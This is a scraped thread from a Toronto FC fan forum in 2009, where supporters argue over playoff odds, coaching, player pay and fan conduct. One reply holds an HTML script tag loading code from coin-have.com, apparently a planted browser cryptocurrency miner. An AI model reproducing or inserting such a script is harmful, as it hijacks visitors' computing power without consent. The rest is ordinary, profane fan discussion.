Page 16 of 16 FirstFirst ... 61213141516
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by canadian_bhoy View Post

I am confident that TFC WILL make the playoffs this season.
    The fact that you think this qualifies as "sense" speaks volumes about the over-support some folk have for their team's administration and underperforming players. Mathematically we're currently only 36% likely to make it.

There's a difference between "faith" and "blind faith." One can be rational, the other is just orthodoxy, and usually foolish.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I think TFC can win it all!! We just have to get behind them - WE HAVE TO SUPPORT 100% AT ALL TIMES!!!

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by The Kingpin View Post
    I think TFC can win it all!! We just have to get behind them - WE HAVE TO SUPPORT 100% AT ALL TIMES!!!
    check your pm
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by TFC USA View Post
    We should've won in 2008 but Cuntingham fucked everything up.

MLS playoffs....we were still in contention when we beat Chicago but other teams didn't hold up their end and out we went.

How big of an improvement is this really?

If we've really made improvement then we make the playoffs CONVINCINGLY.

the whole league is going to roll over and die for TFC?? come on... we are still a 2.5 yr club still learning the league, refs, winning away from BMO, too many fans are expecting too much too soon...we are NOT a team that will do much in the playoffs till we learn to win away from BMO or at BMO on a regular basis and the might not be till next season..we have made prgress where we are not getting hammered in place like New England where giving up 3-4 goals each visit was common.. success takes time...

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by boban View Post
    I don't know either.
    But an educated guess would be what the rate per game is for a said player during the regular season.
    How much are you guessing on this?

I have yet to see a single shred of evidence that players get additional money for games outside of MLS. In fact I see more evidence that MLS regulations prevent the players from receiving payment for other competitions.

Can you please give me the source of your information that players are being compensated for non-MLS competetive games.

Thankyou.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Funny - the last thread i contributed to was about some face paint guy complaining about a loudmouth fan in his section who is constantly yelling at his team and apparently hurting both the players and the fans morale - and according to one witness especially during the second half.

Other than yelling at the face paint guys dad, there is something to be said about somebody who is that angry with thier team - especially in the second half where we seem to lose our points.

Mo and Cummins really have to take responsability at some point. Even though they are not putting on boots for the 90 minutes, I feel this squad is undermanned, over aged, and mentally/strategically ill prepared for winning games and making the playoffs.

I hope I'm wrong because they have a few really strong players like dero, frei, cronin, gomez, attakora, barrett...and with extra help the wynns, vittis, brennans, serioux can still be helpful. We cannot, or should not be playing the Robinsons and Garcias because we have no better options. The other teams we are playing are getting younger, bigger and more agressive. They have more liquid depth.

We really should demand more, deserve more and have a GM who can provide more for our $. There's nothing wrong with wanting the wins. Expecting 3 points more often than not.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by P-NUTZ View Post
    Funny - the last thread i contributed to was about some face paint guy complaining about a loudmouth fan in his section who is constantly yelling at his team and apparently hurting both the players and the fans morale - and according to one witness especially during the second half.

Other than yelling at the face paint guys dad, there is something to be said about somebody who is that angry with thier team - especially in the second half where we seem to lose our points.
    just because someone doesn't berate and insult the players during the 90 minutes we get to see TFC, doesn't mean the person is not angry. It's more about time and place and purpose.
    At the end of the game is a great time to boo... on the message boards is a great place to complain... or call the TFC GOAL line and ream them out during the week. I don't think insulting players during the game is going to help anything. And there are many ways one can voice displeasure.

Some of us just respect the game too much too be an asshole during it. we can be assholes after
    Last edited by rocker; 08-05-2009 at 04:38 PM.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I don't think that's quite my point - i'm suggesting that sport teams certainly get the message quickly in person during the time of poor play. It's clear because it can't be ignored then. Better to catch the hand in the cookie jar than being upsaet after the fact that the jar is empty. I'm sure these atheletes understand they are being paid to perform thier best for that 90 minutes whe they are all truly judged.

berating...asshole..and such is not the point.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

When "kick and chase" Carver was in town Cummins wasn't good enough to be head coach, however; when Carver leaves town, Cummins is magically good enough to be head coach. Cummin's strategies just do not make sense to me. Take for example the 1st leg v PRI, I thought the strategy was pass it to Brennan who will in turn send in a Hail Mary Cross to Gerba. Why a Hail Mary? Because Gerba has no arial game. Dicchio should have been the target man with this strategy, hell he came on for 5 minutes and made something out of a nothing cross, almost beating the keeper.

I am happy that I am not alone in questioning the direction of this club, however; I do not expect change, why? Because in the tunnel after the 1st leg, 90% of the people were chanting and laughing. That tells me they only come out for the atmosphere and a good time. These same "wanna be fans" know nothing of DPs and legit coaches. They just saw the Bank of Montreal "this is our house" commercial and wanted to sit next to the Ultimate Warrior impersonator.

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

This is the only TFC highlight that I found worthy in the last 24hrs...

http://www.torontosun.com/sports/soc.../10370316.html
    @FluSH_RPB / IG: @Flush.rpb
    The Legendary
    RED PATCH BOYS

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

^Those rolls of grass look pretty sketchy actually.

I really hope no one gets hurt. Whether it's us or them.
    “What the world needs is more geniuses with humility; there are so few of us left.”

Gixmo

Quote Originally Posted by FluSH View Post
    This is the only TFC highlight that I found worthy in the last 24hrs...

http://www.torontosun.com/sports/soc.../10370316.html
    Your like a mini buddha to me, bringing joy to my life

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Thumbs down Last night

Quote Originally Posted by ExiledRed View Post

I have yet to see a single shred of evidence that players get additional money for games outside of MLS. In fact I see more evidence that MLS regulations prevent the players from receiving payment for other competitions.

Can you please give me the source of your information that players are being compensated for non-MLS competetive games.

Thankyou.
    Hi Exiled;

The way the team played last night, you know they are not getting paid extra cash. That game was a fucking disgrace. There is something drastically wrong with this team. There was no cohesivness to their play, and the coach looks out of his league. There is no way this team is going to make the play offs.

MLSE has seen the error in its way with the hockey and basketball teams and hired competent people to run each show. It's time that they realized that they have made the same mistake with the soccer team (i.e. hiring an in-experience Manager on the cheap with no proven record) and hire someone with some credentials that can run a football team.

Simply put: the Management is wrong (Mo) and the coaching is wrong (Cummings)

End of Story

RPB Member XI17 Moderator
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Thankyou.
    But in all honesty, why would players even play in non-league sanctioned matches if they weren't getting compensated? Obviously, guys are getting paid because they keep showing up for the matches.

In any case, I emailed the player's union asking that and am waiting for a reply.
    Last edited by Cashcleaner; 08-05-2009 at 11:29 PM.
    Did the USA , of all countries, just fix soccer? - C. Ronaldo, May 27th commenting on the FBI-led investigations into fraud and corruption throughout FIFA.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Thankyou.
    we talked about this before. I was talking about super liga at the time tho and you said they werent getting paid to play in it. And then i found articles that showed they did get paid for Super Liga.

Im sure they get paid something for Concacaf Champions League as well. I just havent hunted to find any proof.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by A Stick View Post
    Hi Exiled;

The way the team played last night, you know they are not getting paid extra cash. That game was a fucking disgrace. There is something drastically wrong with this team. There was no cohesivness to their play, and the coach looks out of his league. There is no way this team is going to make the play offs.

MLSE has seen the error in its way with the hockey and basketball teams and hired competent people to run each show. It's time that they realized that they have made the same mistake with the soccer team (i.e. hiring an in-experience Manager on the cheap with no proven record) and hire someone with some credentials that can run a football team.

Simply put: the Management is wrong (Mo) and the coaching is wrong (Cummings)

End of Story
    man we have even played worse in MLS games in the past !!!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Sonny Cheeba View Post
    refs do in scotland. i've got plenty of evidence for you...
    man just watch are team canada national team as well. Refs can win games!!!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

The decent chapter of the Toronto Fans that visited PR for the game celebrating friendship and enjoying a few beers with the Islanders Bravada after the game!

Not to be confused with the beer throwing hooligans at BMO field.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by ForestGlade View Post
    I hate the Islanders, but you gotta admit the Darth Vader "I Am Your Father" TIFO is pretty funny
    That was AWESOME!!.. Does anyone have a pic of that?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by OHARARULES View Post
    That was AWESOME!!.. Does anyone have a pic of that?
    Here are a couple shots:

http://hiapr.org/yabb/Attachments/Is..._sobre_TFC.jpg
    http://hiapr.org/yabb/Attachments/I_am_your_Father2.JPG

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

The debut of the Orange Darth Vader!